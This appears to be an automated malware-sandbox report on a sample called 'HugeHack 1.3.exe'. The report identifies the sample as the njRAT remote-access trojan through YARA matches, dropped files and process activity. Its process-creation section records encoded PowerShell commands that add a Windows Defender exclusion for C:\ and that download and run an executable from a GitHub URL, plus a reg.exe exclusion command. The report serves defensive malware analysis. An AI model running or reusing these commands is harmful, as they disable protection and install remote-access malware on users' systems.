Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AC86 NtQuerySystemInformation,	2_2_00E8AC86
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_00E8AC55 NtQuerySystemInformation,	2_2_00E8AC55
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AF02 NtQuerySystemInformation,	16_2_0098AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098BC72 NtSetInformationProcess,	16_2_0098BC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098BC50 NtSetInformationProcess,	16_2_0098BC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0098AED1 NtQuerySystemInformation,	16_2_0098AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAF02 NtQuerySystemInformation,	22_2_013BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 22_2_013BAED1 NtQuerySystemInformation,	22_2_013BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAF02 NtQuerySystemInformation,	23_2_014EAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 23_2_014EAED1 NtQuerySystemInformation,	23_2_014EAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AF02 NtQuerySystemInformation,	25_2_0060AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_0060AED1 NtQuerySystemInformation,	25_2_0060AED1

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A139B	2_2_012A139B
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A15B3	2_2_012A15B3
Source: C:\Users\user\AppData\Local\Temp\Payload.exe	Code function: 2_2_012A1600	2_2_012A1600
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292AF08	3_2_0292AF08
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292C1B8	3_2_0292C1B8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_0292DE28	3_2_0292DE28
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B8EE8	3_2_065B8EE8
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_065B9D31	3_2_065B9D31
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F5CB40	3_2_07F5CB40
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F57808	3_2_07F57808
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F577F9	3_2_07F577F9
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F56738	3_2_07F56738
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F59AAF	3_2_07F59AAF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F5DA47	3_2_07F5DA47
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F9BCC0	3_2_07F9BCC0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F93BED	3_2_07F93BED
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F90750	3_2_07F90750
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F95AF0	3_2_07F95AF0
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_07F95ADF	3_2_07F95ADF
Source: C:\Users\user\AppData\Local\Temp\webhook.exe	Code function: 3_2_081109E0	3_2_081109E0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0099118A	16_2_0099118A
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_0099152E	16_2_0099152E
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD0EC0	16_2_00DD0EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DDD038	16_2_00DDD038
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD3D08	16_2_00DD3D08
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD8738	16_2_00DD8738
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 16_2_00DD0E90	16_2_00DD0E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0471B4A0	18_2_0471B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0471B490	18_2_0471B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_083B3A98	18_2_083B3A98

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\webhook.exe 780BF370F55BED41C91E40A07DB66BF12059F38E8AD1B9481DA1748BEA29FF48

PE file contains executable resources (Code or Archives)

Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: HugeHack 1.3.exe.bin.exe	Static PE information: Resource name: RT_RCDATA type: Java archive data (JAR)

Sample file is different than original file name gathered from version info

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1232460461.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejavaw.exeN vs HugeHack 1.3.exe.bin.exe
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewebhooker2.exe6 vs HugeHack 1.3.exe.bin.exe

Uses 32bit PE files

Source: HugeHack 1.3.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Yara signature match

Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
